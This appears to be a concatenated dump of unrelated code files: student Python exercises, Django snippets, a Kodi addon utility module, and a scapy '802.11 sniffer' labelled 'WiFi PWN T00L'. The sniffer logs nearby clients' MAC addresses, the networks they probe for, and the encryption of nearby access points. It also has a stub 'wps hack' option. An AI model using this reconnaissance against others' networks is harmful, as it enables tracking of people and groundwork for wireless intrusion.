------------------------------------------------------------------------------
Diese 4 Freiheiten (0-3) wurden so von Richard Stallman entworfen.
Um mit gutem Beispiel voran zu gehen, hat er angefangen, ein vollständig
freies Betriebssystem zu entwickeln.
Heute werden Linux basierte GNU Systeme von vielen Millionen Anwendern benutzt."""
texts['he'] = """"תוכנה חופשית" זה ענײן של חירות, לא של מחיר. כדי להבין את העקרון,
צריך לחשוב על "חופש" כמו ב"חופש הביטוי"...\
.effectpause
.back 3
ולא כמו ב"בירה חופשי".
תוכנה חופשית נוגעת לחופש של משתמשים להריץ, להפיץ הפצת-המשך, ללמוד,
לשנות ולשפר את התוכנה. ליתר דיוק, זה מתײחס לארבעה סוגים של חירות למשתמשי
התוכנה:
------------------------------------------------------------------------------
0. החופש להריץ את התוכנה, לכל מטרה שהיא.
1. החופש ללמוד איך תוכנה עובדת, ולשנות אותה לצרכיהם.
גישה לקוד המקור היא תנאי מקדים לכך.
2. החופש להפיץ עותקים בהפצה-חוזרת כדי שיוכלו למשל לעזור לשכנים שלהם.
3. החופש לשפר את התוכנה, ולשחרר את השיפורים שלהם לציבור, כך שכל הקהילה תרויח.
גישה לקוד-המקור היא תנאי מקדים לכך.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
import os, re
lang = os.getenv ('LANG')
i = lang.find ('_')
if i > 0:
lang = lang[:i]
text = texts.get (lang, texts['en'])
def break_on_dashlines (text):
s = ''
for line in text.split ('\n'):
if re.match ('^----*$', line):
yield s
s = ''
else:
if s:
s += '\n'
s += line
yield s
for slide in break_on_dashlines (text):
text_slide (slide)
if __name__ == "__main__":
import slippy
import gnu_theme
slippy.main (slides, gnu_theme, args = ['--slideshow', '--delay', '0.05', '--repeat'])
| [
"[email protected]"
]
| |
f0b3710c6bf6eebf47cd69db345fc58831d7d39c | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/308/usersdata/295/73012/submittedfiles/ex1.py | d7faface2964c55c9b074fbe6eed286761f20fc3 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # -*- coding: utf-8 -*-
from __future__ import division
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
#COMECE A PARTIR DAQUI!
# DH below is read as the discriminant (delta) of a*x**2 + b*x + c
# (an assumption about the exercise's intent).
DH = b**2 - 4*a*c
if DH > 0:
    print("X1 e X2")
else:
    print("SRR")
| [
"[email protected]"
]
| |
b8664ce8a44166d29e61a75e3ca17132ba423261 | 76eb17916555462a9219cb7cfea741b2281ace7b | /testbot/urls.py | 8b8843e97dfa5a7526faad8d82ac7c207b0cbefc | [
"MIT"
]
| permissive | luungoc2005/chatbot_test | 6ecabbe507d01418282a883d6ab70eb10130c991 | f8c901c9c14a50727a7b514dda1e569c8180b458 | refs/heads/master | 2021-08-30T13:07:20.132250 | 2017-11-15T03:35:47 | 2017-11-15T03:35:47 | 105,901,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | from django.urls import path
from . import views
urlpatterns = [
# ex: /testbot/
path('', views.index, name='index'),
path('examples/', views.examples, name='examples'),
path('test/', views.test, name='test'),
] | [
"[email protected]"
]
| |
5cac8cdc56b579d7b87c1b9d6a558ed496f54f49 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /7QPHWACcDihT3AM6b_6.py | 42998e86441fe6f7df22cf74314d844cef6aab32 | []
| no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | """
You are given an input array of bigrams, and an array of words.
Write a function that returns `True` if **every single bigram** from this
array can be found at least **once** in an array of words.
### Examples
can_find(["at", "be", "th", "au"], ["beautiful", "the", "hat"]) ➞ True
can_find(["ay", "be", "ta", "cu"], ["maybe", "beta", "abet", "course"]) ➞ False
# "cu" does not exist in any of the words.
can_find(["th", "fo", "ma", "or"], ["the", "many", "for", "forest"]) ➞ True
can_find(["oo", "mi", "ki", "la"], ["milk", "chocolate", "cooks"]) ➞ False
### Notes
* A **bigram** is string of two consecutive characters in the same word.
* If the list of words is empty, return `False`.
"""
def can_find(bigrams, words):
    if not words:
        return False
    # join with spaces so a bigram cannot falsely match across word boundaries
    text = ' '.join(words)
    for bi in bigrams:
        if bi not in text:
            return False
    return True
| [
"[email protected]"
]
| |
a53d180b2d0604cbcd6624d4c8f734141673ae1d | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/fd662cf898124b46b21e2ca30d117042.py | 6281c95b5842337f10d96aec50200b80c8cd2e1d | []
| no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 346 | py | def hey(input):
has_alpha = False
has_num = False
for i in input:
if i.isalpha():
has_alpha = True
elif i.isnumeric():
has_num = True
if not has_alpha and not has_num:
return "Fine. Be that way!"
if input.upper() == input and has_alpha:
return "Whoa, chill out!"
if input[-1] == "?":
return "Sure."
return "Whatever."
| [
"[email protected]"
]
| |
cd9d8b0b39e0e09d7940516635e9a94f971f38fc | 7f4886802e83352f37d35509b7775c93c2756105 | /accounts/forms.py | db5c1f9a162a945c87a84c42d50cf009988f7614 | []
| no_license | JihyeKim0923/lion10 | c23a019c3725de2d9f70556993db1ed3e8d6ae2e | 2b76dc9290bec6f4d827a625b2f0b1e92c85ed53 | refs/heads/master | 2020-06-19T02:56:24.746341 | 2019-07-11T15:40:17 | 2019-07-11T15:40:17 | 196,539,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django import forms
class CreateUserForm(UserCreationForm):
email=forms.EmailField(required=True)
nickname=forms.CharField(required=True)
class Meta:
model=User
fields=("username","email","nickname","password1","password2")
def save(self, commit=True):
user=super(CreateUserForm,self).save(commit=False)
user.nickname=self.cleaned_data["nickname"]
user.email=self.cleaned_data["email"]
if commit:
user.save()
return user | [
"[email protected]"
]
| |
369d942517debc6f30b559509854cb06ba1ef9e5 | 27d0ea837489f68978287e369b60faa57eeb2497 | /examples/wifiz.py | 9044f15d865520323e139912c9568d0c8210365d | []
| no_license | nimdavtanke/wifi-scripts | 9692a4c67d23cc1a7d076d6a41be2bdd6cf4d3ce | 83576bcbf62cdfe020b5c2178f9ab177733de1dc | refs/heads/master | 2016-08-06T15:20:47.206467 | 2015-03-28T08:37:16 | 2015-03-28T08:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,227 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# 802.11 sniffer/wpsig/wpspin/reaver
# Credits go to:
#
# Craig Heffner Tactical Network Solutions
# https://github.com/devttys0/wps
#
# WPSIG [[email protected], [email protected]]
__author__ = '090h'
__license__ = 'GPL'
from sys import argv, exit
from os import path, geteuid
# import logging
# logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# from scapy.all import conf
# conf.verb = 1
# conf.use_pcap = True
# conf.use_dnet = False
from scapy.layers.dot11 import *
from scapy.all import *
# impacket
try:
from impacket import dot11
from impacket.dot11 import Dot11
from impacket.dot11 import Dot11Types
from impacket.dot11 import Dot11ManagementFrame
from impacket.dot11 import Dot11ManagementProbeRequest
from impacket.ImpactDecoder import RadioTapDecoder
except ImportError:
    logging.warning('impacket import failed. RadioTap decoding will not be available.')
from pprint import pprint
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
if LINUX:
# print('Linux detected. Trying to import PyLorcon2...')
try:
import PyLorcon2
except ImportError:
logging.warning('PyLorcon2 import failed. Injection is not available.')
if WINDOWS:
logging.error('Sorry, no Windows.')
exit(-1)
if DARWIN:
logging.warning('OS X detected. Only pasive mode will be available')
#TODO: add iOS and Android detection
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
class WiFiWizard(object):
def __init__(self, iface, output=None, whitelist=None, verbose=False):
# Replace this with your phone's MAC address
if not whitelist: whitelist = ['00:00:00:00:00:00', ]
self.iface = iface
self.whitelist = whitelist
self.verbose = verbose
self.aps = {}
self.clients = {}
# Probe requests from clients
def handle_probe(self, pkt):
if pkt.haslayer(Dot11ProbeReq) and '\x00' not in pkt[Dot11ProbeReq].info:
essid = pkt[Dot11ProbeReq].info
else:
essid = 'Hidden SSID'
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist:
#TODO: add logging
return
# New client
if client not in self.clients:
self.clients[client] = []
print('[!] New client: %s ' % client)
if essid not in self.clients[client]:
self.clients[client].append(essid)
print('[+] New ProbeRequest: from %s to %s' % (client, essid))
def handle_beacon(self, pkt):
if not pkt.haslayer(Dot11Elt):
return
# Check to see if it's a hidden SSID
essid = pkt[Dot11Elt].info if '\x00' not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pkt[Dot11].addr3
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist or bssid in self.whitelist:
#TODO: add logging
return
try:
channel = int(ord(pkt[Dot11Elt:3].info))
except:
channel = 0
try:
extra = pkt.notdecoded
rssi = -(256-ord(extra[-4:-3]))
except:
rssi = -100
p = pkt[Dot11Elt]
capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
"{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
# print('capability = %s' % capability)
        # IE 48 is the RSN element (WPA2); IE 221 with the Microsoft WPA OUI
        # (00:50:F2, type 1) marks WPA; otherwise fall back to the privacy
        # capability bit (WEP) or report an open network.
        crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
crypto.add("WPA")
p = p.payload
if not crypto:
if 'privacy' in capability:
crypto.add("WEP")
else:
crypto.add("OPN")
enc = '/'.join(crypto)
if bssid not in self.aps:
self.aps[bssid] = (channel, essid, bssid, enc, rssi)
print "[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}\t{4:4}".format(channel, essid, bssid, enc, rssi)
def pkt_handler(self, pkt):
# wlan.fc.type == 0 Management frames
# wlan.fc.type == 1 Control frames
# wlan.fc.type == 2 Data frames
# wlan.fc.type_subtype == 0 Association request
# wlan.fc.type_subtype == 1 Association response
# wlan.fc.type_subtype == 2 Reassociation request
# wlan.fc.type_subtype == 3 Reassociation response
# wlan.fc.type_subtype == 4 Probe request
# wlan.fc.type_subtype == 5 Probe response
# wlan.fc.type_subtype == 8 Beacon
try:
print('-->', pkt.name)
except:
pass
#Beacon
if pkt.haslayer(Dot11Beacon):
self.handle_beacon(pkt)
        # Client ProbeReq
        if pkt.haslayer(Dot11ProbeReq):
            self.handle_probe(pkt)
        # if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
        # ProbeResp frames carry the same AP fields that handle_beacon parses
        if pkt.haslayer(Dot11ProbeResp):
            self.handle_beacon(pkt)
def sniff(self):
'''
Sniff Beacon and Probe Requst/Response frames to extract AP info
:param count: packets to capture, 0 = loop
:return:
'''
print('Press Ctrl-C to stop sniffing.')
sniff(iface=self.iface,
prn=self.pkt_handler,
lfilter=lambda p: p.haslayer(Dot11))
if __name__ == '__main__':
parser = ArgumentParser(description='WiFi PWN T00L', formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
parser.add_argument('interface', help='802.11 interface to use')
parser.add_argument('-c', '--channel', required=False)
parser.add_argument('-w', '--wps', required=False, action='store_true', help='wps hack')
parser.add_argument('-a', '--active', required=False, action='store_true', help='active mode')
args = parser.parse_args()
if geteuid() != 0:
exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'.")
WiFiWizard(args.interface).sniff()
| [
"[email protected]"
]
| |
4a5c5376aa7ce609fdb64cecfb2774f44dbc8725 | cf0480eb13906bf6e2c46bfe09b864ee9bbf6776 | /Functions/Calc/Calc_1.py | 3b600966f2c62976f2522ee032f37f2d17a06b1c | []
| no_license | ravi4all/Python_JuneRegular_Evening | f7afb665541b88a9cb6ce89a488a32120f63dd6b | ad6e17c4acdcb2c669ba0508b12aeca8bdab8976 | refs/heads/master | 2020-03-20T21:20:36.763561 | 2018-07-06T11:26:52 | 2018-07-06T11:26:52 | 137,736,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | print("""
1. Add
2. Sub
3. Mul
4. Div
""")
user_choice = input("Enter your choice : ")
num_1 = int(input("Enter first number : "))
num_2 = int(input("Enter second number : "))
if user_choice == "1":
    result = num_1 + num_2
    print("Sum is",result)
elif user_choice == "2":
    result = num_1 - num_2
    print("Diff is", result)
elif user_choice == "3":
    result = num_1 * num_2
    print("Mul is", result)
elif user_choice == "4":
    result = num_1 / num_2
    print("Div is", result)
| [
"[email protected]"
]
| |
f3ed0316d367ac2d8180e59a9ef4e265df2eb72b | d78dfc5089717fc242bbd7097f507d811abb4260 | /French/plugin.video.fr.filmsdefrance/streamcomplet_common.py | 01bb111cb943894548d6f78bf38f215525777056 | []
| no_license | tustxk/AddOnRepo | 995b980a9ec737e2c25bed423fc83f710c697e40 | 6b86a06cb37e6e10b4119584dd7311ebc2318e54 | refs/heads/master | 2022-10-08T21:34:34.632346 | 2016-10-28T09:48:01 | 2016-10-28T09:48:01 | 70,684,775 | 1 | 1 | null | 2022-10-01T16:27:13 | 2016-10-12T09:31:16 | Python | UTF-8 | Python | false | false | 69,201 | py | ### ############################################################################################################
### #
### # Author: # The Highway
### # Description: # Common File
### #
### ############################################################################################################
### ############################################################################################################
### Imports ###
import xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
import os,sys,string,StringIO,logging,random,array,time,datetime,re
import urllib,urllib2,htmllib
from streamcomplet_config import *
#import urlresolver
#import copy
#try: import json
#except ImportError: import simplejson as json
#try: import StorageServer
#except: import storageserverdummy as StorageServer
#cache = StorageServer.StorageServer(plugin_id)
try: from addon.common.net import Net
except:
try: from t0mm0.common.net import Net
except:
try: from c_t0mm0_common_net import Net
except: pass
try: from addon.common.addon import Addon
except:
try: from t0mm0.common.addon import Addon
except:
try: from c_t0mm0_common_addon import Addon
except: pass
#try: from sqlite3 import dbapi2 as sqlite; print "Loading sqlite3 as DB engine"
#except: from pysqlite2 import dbapi2 as sqlite; print "Loading pysqlite2 as DB engine"
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import cHiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
UsedLanguages=ps('UsedLanguages');
### ############################################################################################################
__plugin__=ps('__plugin__'); __authors__=ps('__authors__'); __credits__=ps('__credits__');
### ############################################################################################################
##### Addon / Plugin Basic Setup #####
_addon_id=ps('_addon_id'); _plugin_id=ps('_addon_id');
_addon=Addon(ps('_addon_id'), sys.argv); addon=_addon;
_plugin=xbmcaddon.Addon(id=ps('_addon_id'));
try:
try: import StorageServer as StorageServer
except:
try: import c_StorageServer as StorageServer
except:
try: import storageserverdummy as StorageServer
except:
try: import c_storageserverdummy as StorageServer
except: pass
cache=StorageServer.StorageServer(ps('_addon_id'))
except: pass
##### Paths #####
#_database_name=ps('_database_name')
#_database_file=os.path.join(xbmc.translatePath("special://database"),ps('_database_name')+'.db');
#DB=_database_file;
_domain_url=ps('_domain_url'); _du=ps('_domain_url');
_addonPath =xbmc.translatePath(_plugin.getAddonInfo('path'))
_artPath =xbmc.translatePath(os.path.join(_addonPath,ps('_addon_path_art')))
_datapath =xbmc.translatePath(_addon.get_profile());
_artIcon =_addon.get_icon();
_artFanart =_addon.get_fanart()
##### Important Functions with some dependencies #####
def addstv(id,value=''): _addon.addon.setSetting(id=id,value=value) ## Save Settings
def addst(r,s=''): return _addon.get_setting(r) ## Get Settings
def addpr(r,s=''): return _addon.queries.get(r,s) ## Get Params
def tfalse(r,d=False): ## Get True / False
if (r.lower()=='true' ) or (r.lower()=='t') or (r.lower()=='y') or (r.lower()=='1') or (r.lower()=='yes'): return True
elif (r.lower()=='false') or (r.lower()=='f') or (r.lower()=='n') or (r.lower()=='0') or (r.lower()=='no'): return False
else: return d
def tfalse_old(r,d=False): ## Get True / False
if (r.lower()=='true' ): return True
elif (r.lower()=='false'): return False
else: return d
def art(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,f+fe)) ### for Making path+filename+ext data for Art Images. ###
def artp(f,fe='.png'): return art(f,fe)
def artj(f,fe='.jpg'): return art(f,fe)
def ROart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def ROartp(f,fe='.png'): return ROart(f,fe)
def ROartj(f,fe='.jpg'): return ROart(f,fe)
def FRart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def FRartp(f,fe='.png'): return FRart(f,fe)
def FRartj(f,fe='.jpg'): return FRart(f,fe)
##### Settings #####
_setting={};
_setting['enableMeta'] = _enableMeta =tfalse(addst("enableMeta"))
_setting['debug-enable']= _debugging =tfalse(addst("debug-enable"));
_setting['debug-show'] = _shoDebugging =tfalse(addst("debug-show"))
debugging=_debugging
##### Variables #####
_default_section_=ps('default_section');
net=Net();
BASE_URL=ps('_domain_url');
### ############################################################################################################
### ############################################################################################################
def eod(): _addon.end_of_directory()
def notification(header="", message="", sleep=5000 ): xbmc.executebuiltin( "XBMC.Notification(%s,%s,%i)" % ( header, message, sleep ) )
def myNote(header='',msg='',delay=5000,image='http://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/US_99_%281961%29.svg/40px-US_99_%281961%29.svg.png'): _addon.show_small_popup(title=header,msg=msg,delay=delay,image=image)
def cFL( t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t+'[/COLOR]' ### For Coloring Text ###
def cFL_(t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t[0:1]+'[/COLOR]'+t[1:] ### For Coloring Text (First Letter-Only) ###
def WhereAmI(t): ### for Writing Location Data to log file ###
if (_debugging==True): print 'Where am I: '+t
def deb(s,t): ### for Writing Debug Data to log file ###
	if (_debugging==True): print s+': '+str(t)
def debob(t): ### for Writing Debug Object to log file ###
if (_debugging==True): print t
def nolines(t):
it=t.splitlines(); t=''
for L in it: t=t+L
t=((t.replace("\r","")).replace("\n",""))
return t
def isPath(path): return os.path.exists(path)
def isFile(filename): return os.path.isfile(filename)
def getFileExtension(filename):
ext_pos = filename.rfind('.')
if ext_pos != -1: return filename[ext_pos+1:]
else: return ''
def get_immediate_subdirectories(directory):
return [name for name in os.listdir(directory) if os.path.isdir(os.path.join(directory, name))]
def findInSubdirectory(filename, subdirectory=''):
if subdirectory: path = subdirectory
else: path = _addonPath
for root, _, names in os.walk(path):
if filename in names: return os.path.join(root, filename)
	raise IOError('File not found')
def get_xbmc_os():
try: xbmc_os = os.environ.get('OS')
except: xbmc_os = "unknown"
return xbmc_os
def get_xbmc_version():
try: xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
except: xbmc_version = 'Unknown'
return xbmc_version
def get_xbmc_revision():
rev_re = re.compile('r(\d+)')
try: xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
except: xbmc_version = 'Unknown'
try: xbmc_rev=int(rev_re.search(xbmc_version).group(1)); deb("addoncompat.py: XBMC Revision",xbmc_rev)
except: xbmc_rev=0; deb("addoncompat.py: XBMC Revision not available - Version String",xbmc_version)
return xbmc_rev
def _SaveFile(path,data):
file=open(path,'w')
file.write(data)
file.close()
def _OpenFile(path):
deb('File',path)
if os.path.isfile(path): ## File found.
deb('Found',path)
file = open(path, 'r')
contents=file.read()
file.close()
return contents
else: return '' ## File not found.
def _CreateDirectory(dir_path):
dir_path = dir_path.strip()
if not os.path.exists(dir_path): os.makedirs(dir_path)
def _get_dir(mypath, dirname): #...creates sub-directories if they are not found.
subpath = os.path.join(mypath, dirname)
if not os.path.exists(subpath): os.makedirs(subpath)
return subpath
def askSelection(option_list=[],txtHeader=''):
if (option_list==[]):
debob('askSelection() >> option_list is empty')
return None
dialogSelect = xbmcgui.Dialog();
index=dialogSelect.select(txtHeader, option_list)
return index
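# Illustrative usage (labels are placeholders): select() returns the chosen index, or -1 on cancel:
#   choice=askSelection(['Play','Download'],'Pick an action')
#   if choice==0: deb('selection','Play')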
def iFL(t): return '[I]'+t+'[/I]' ### For Italic Text ###
def bFL(t): return '[B]'+t+'[/B]' ### For Bold Text ###
def _FL(t,c,e=''): ### For Custom Text Tags ###
if (e==''): d=''
else: d=' '+e
return '['+c.upper()+d+']'+t+'[/'+c.upper()+']'
def aSortMeth(sM,h=int(sys.argv[1])):
xbmcplugin.addSortMethod(handle=h, sortMethod=sM)
def set_view(content='none',view_mode=50,do_sort=False):
deb('content type: ',str(content))
deb('view mode: ',str(view_mode))
h=int(sys.argv[1])
	if (content!='none'): xbmcplugin.setContent(h, content)
if (tfalse(addst("auto-view"))==True): xbmc.executebuiltin("Container.SetViewMode(%s)" % str(view_mode))
def showkeyboard(txtMessage="",txtHeader="",passwordField=False):
if txtMessage=='None': txtMessage=''
keyboard = xbmc.Keyboard(txtMessage, txtHeader, passwordField)#("text to show","header text", True="password field"/False="show text")
keyboard.doModal()
if keyboard.isConfirmed():
return keyboard.getText()
else:
return False # return ''
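# Illustrative usage: returns the entered text, or False if the keyboard was cancelled:
#   query=showkeyboard('','Search')
#   if query: deb('search query',query)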
def ParseDescription(plot): ## Cleans up HTML entities and mojibake sequences in scraped plot text.
if ("&" in plot): plot=plot.replace('&' ,'&')#&#x27;
if (" " in plot): plot=plot.replace(' ' ," ")
if ("’" in plot): plot=plot.replace('’' ,"'")
if ("–" in plot): plot=plot.replace("–","-") #unknown
if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
#if addst('my-language','French').lower()=='French':
if ('&#' in plot) and (';' in plot):
if ("–" in plot): plot=plot.replace("–","-") #unknown
if ("‘" in plot): plot=plot.replace("‘","'")
if ("’" in plot): plot=plot.replace("’","'")
if ("“" in plot): plot=plot.replace('“','"')
if ("”" in plot): plot=plot.replace('”','"')
if ("×" in plot): plot=plot.replace('×' ,'x')
if ("'" in plot): plot=plot.replace(''' ,"'")
if ("ô" in plot): plot=plot.replace('ô' ,"o")
if ("·" in plot): plot=plot.replace('·' ,"-")
if ("û" in plot): plot=plot.replace('û' ,"u")
if ("à" in plot): plot=plot.replace('à' ,"a")
if ("ƥ" in plot): plot=plot.replace('ƥ',"")
if ("é" in plot): plot=plot.replace('é' ,"e")
if ("â" in plot): plot=plot.replace('â' ,"a")
if ("&" in plot): plot=plot.replace('&' ,"&")
#if ("a" in plot): plot=plot.replace('a' ,"a")
##if (chr(239) in plot): plot=plot.replace(chr(239) ,"'")
#zz=[[u'\xe2','a']] #[[196,'a'],[196,'a'],[196,'a'],[196,'a'],[196,'a']]
#for c1,c2 in zz:
# if (chr(c1) in plot): plot=plot.replace(chr(c1) ,c2)
##plot=plot.replace(chr('0x92'),"'")
if ('&#' in plot) and (';' in plot):
try: matches=re.compile('&#(.+?);').findall(plot)
except: matches=''
if (matches is not ''):
for match in matches:
if (match is not '') and (match is not ' ') and ("&#"+match+";" in plot):
try: plot=plot.replace("&#"+match+";" ,"")
#try: plot=plot.replace("&#"+match+";" ,""+match)
except: pass
try: matches=re.compile('\\x([0-9a-zA-Z][0-9a-zA-Z])').findall(plot)
except: matches=''
#if (matches is not ''):
# for match in matches:
# if (match is not '') and (match is not ' ') and ("\\x"+match+"" in plot):
# try: plot=plot.replace("\\x"+match+"","")
# #try: plot=plot.replace("\\x"+match+"",""+match)
# except: pass
#if ("\xb7" in plot): plot=plot.replace('\xb7' ,"-")
#if ('&#' in plot) and (';' in plot): plot=unescape_(plot)
for i in xrange(127,256):
try: plot=plot.replace(chr(i),"")
except: pass
return plot
def unescape_(s):
p = htmllib.HTMLParser(None)
p.save_bgn()
p.feed(s)
return p.save_end()
def messupText(t,_html=False,_ende=False,_a=False,Slashes=False):
if (_html==True):
try: t=HTMLParser.HTMLParser().unescape(t)
except: pass
try: t=ParseDescription(t)
except: pass
if (_ende==True):
try:
if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
#if not addst('my-language','French').lower()=='French':
t=t.encode('utf8');
#t=t.encode('utf8','ignore');
#t=t.encode('ascii','ignore');
#t=t.decode('iso-8859-1')
else:
#t=t.encode('utf8','ignore'); t=t.decode('cp1250')
#t=t.encode('utf8'); t=t.decode('cp1250')
#t=t.encode('ascii','ignore'); t=t.decode('iso-8859-1')
#t=unicodedata.normalize('NFKD', unicode(t)).encode('ascii','ignore')
#t=t.encode('ascii','ignore'); t=t.decode('cp1250')
#t=t.encode('ascii','replace'); t=t.decode('cp1250')
#t=t.encode('ascii','strict'); t=t.decode('cp1250')
#t=t.encode('ascii','xmlcharrefreplace'); t=t.decode('cp1250')
#t=t.decode('cp1250')
t=t.encode('utf8');
#t=t.encode('utf8','ignore');
#t=t
except: pass
if (_a==True):
try: t=_addon.decode(t); t=_addon.unescape(t)
except: pass
if (Slashes==True):
try: t=t.replace( '_',' ')
except: pass
#t=t.replace("text:u","")
return t
def nURL(url,method='get',form_data={},headers={},html='',proxy='',User_Agent='',cookie_file='',load_cookie=False,save_cookie=False):
if url=='': return ''
dhtml=''+html
if len(User_Agent) > 0: net.set_user_agent(User_Agent)
else: net.set_user_agent(ps('User-Agent'))
if len(proxy) > 9: net.set_proxy(proxy)
if (len(cookie_file) > 0) and (load_cookie==True): net.set_cookies(cookie_file)
if method.lower()=='get':
try: html=net.http_GET(url,headers=headers).content
except: html=dhtml
elif method.lower()=='post':
try: html=net.http_POST(url,form_data=form_data,headers=headers).content #,compression=False
except: html=dhtml
elif method.lower()=='head':
try: html=net.http_HEAD(url,headers=headers).content
except: html=dhtml
if (len(html) > 0) and (len(cookie_file) > 0) and (save_cookie==True): net.save_cookies(cookie_file)
if 'Website is offline' in html: popOK(msg="Website is offline",title=ps('__plugin__'),line2="Site Web est deconnecte",line3="")
elif 'Erreur de la base de donn' in html: popOK(msg="Error Database",title=ps('__plugin__'),line2="Erreur de la base de donnees",line3="")
return html
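# Illustrative usage (URL is a placeholder): GET a page with the addon's default
# User-Agent, falling back to the supplied html='' default on any failure:
#   html=nURL(_domain_url+'/search?q='+urllib.quote_plus('title'))
#   if len(html)==0: deb('nURL','fetch failed or empty response')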
def BusyAnimationShow(): xbmc.executebuiltin('ActivateWindow(busydialog)')
def BusyAnimationHide(): xbmc.executebuiltin('Dialog.Close(busydialog,true)')
def closeAllDialogs(): xbmc.executebuiltin('Dialog.Close(all, true)')
def popYN(title='',line1='',line2='',line3='',n='',y=''):
diag=xbmcgui.Dialog()
r=diag.yesno(title,line1,line2,line3,n,y)
if r: return r
else: return False
#del diag
def popOK(msg="",title="",line2="",line3=""):
dialog=xbmcgui.Dialog()
#ok=dialog.ok(title, msg, line2, line3)
dialog.ok(title, msg, line2, line3)
def spAfterSplit(t,ss):
if ss in t: t=t.split(ss)[1]
return t
def spBeforeSplit(t,ss):
if ss in t: t=t.split(ss)[0]
return t
def TP(s): return xbmc.translatePath(s)
def TPap(s,fe='.py'): return xbmc.translatePath(os.path.join(_addonPath,s+fe))
def CopyAFile(tFrom,tTo):
try:
import shutil
shutil.copy(tFrom,tTo)
except: pass
def checkHostProblems(url,b=False,t=True):
if ('embed.yourupload.com/' in url) or ('novamov.com/' in url) or ('veevr.com/' in url): b=t
#if 'embed.yourupload.com/' in url: b=t
#elif 'novamov.com/' in url: b=t
return b
### #Metahandler
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#grab=metahandlers.MetaData(preparezip=False)
#def GRABMETA(name,types):
# type=types
# EnableMeta=tfalse(addst("enableMeta"))
# if (EnableMeta==True):
# if ('movie' in type):
# ### grab.get_meta(media_type, name, imdb_id='', tmdb_id='', year='', overlay=6)
# meta=grab.get_meta('movie',name,'',None,None,overlay=6)
# infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year'],'votes': meta['votes'],'tagline': meta['tagline'],'premiered': meta['premiered'],'trailer_url': meta['trailer_url'],'studio': meta['studio'],'imdb_id': meta['imdb_id'],'thumb_url': meta['thumb_url']}
